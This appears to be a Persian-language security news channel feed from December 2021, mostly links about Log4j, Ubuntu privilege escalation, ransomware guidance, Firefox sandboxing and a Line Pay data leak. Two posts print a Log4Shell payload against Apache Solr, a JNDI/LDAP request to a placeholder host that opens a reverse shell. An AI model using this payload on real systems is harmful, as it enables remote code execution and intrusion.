امنیت اطلاعات

2021-12-13 19:49:31 افزونه ی burpsuite برای آسیب پذیری log4j

https://github.com/silentsignal/burp-log4shell


#log4j
#burpsuite

@sec_nerd باز کردن / نظر دهید

2021-12-13 19:47:27 این هم یه تیپ دیگه

https://twitter.com/11xuxx/status/1470142371312635906?s=20


#log4j


@sec_nerd باز کردن / نظر دهید

2021-12-13 19:33:48 اگر تاحالا در مورد log4j و اکسپلویتش نخوندید این مطلب خوبیه

https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/


#log4j


@sec_nerd باز کردن / نظر دهید

2021-12-13 19:31:25 apache solr EXP log4j /solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json #log4j @sec_nerd باز کردن / نظر دهید

2021-12-13 19:26:47 بالابردن سطح دسترسی در ubuntu

https://securitylab.github.com/research/ubuntu-accountsservice-CVE-2021-3939/


#linux
#privesc


@sec_nerd باز کردن / نظر دهید

2021-12-13 19:12:11 apache solr EXP log4j

/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json


#log4j


@sec_nerd باز کردن / نظر دهید

2021-12-07 11:03:48 #fun


@sec_nerd باز کردن / نظر دهید

2021-12-07 10:58:40 مرکز امنیت سایبری کانادا داکیومنت جالبی از نحوه ی رخ دادن حملات باج افزاری منتشر کرده


https://cyber.gc.ca/en/guidance/ransomware-playbook-itsm00099


#ransomware


@sec_nerd باز کردن / نظر دهید

2021-12-07 10:55:45 نسخه ی ۹۵ مرورگر فایرفاکس به سندباکس جدید با نام RLBox مجهز شد.

این سندباکس قابلیت ایزوله کردن ماژولها و کامپوننت های مرورگر برای جلوگیری از آسیب زدن و سوء استفاده از آنها توسط دیگر اجزاء مرورگر را دارد.

https://thehackernews.com/2021/12/latest-firefox-95-includes-rlbox.html


#firefox


@sec_nerd باز کردن / نظر دهید

2021-12-07 10:50:37 نرم افزار پرداخت موبایلی Line Pay به اشتباه اطلاعات پرداختهای ۱۳۳ هزار کاربر را در گیت هاب منتشر کرد!

از این تعداد ۵۱ هزار کاربر ژاپنی و ۸۲ هزار تایوانی بوده اند و ۱۱ بار در طی ۱۰ هفته بازدید داشته است.

https://www.theregister.com/2021/12/07/line_pay_leaks_around_133000/


#leak
#line


@sec_nerd باز کردن / نظر دهید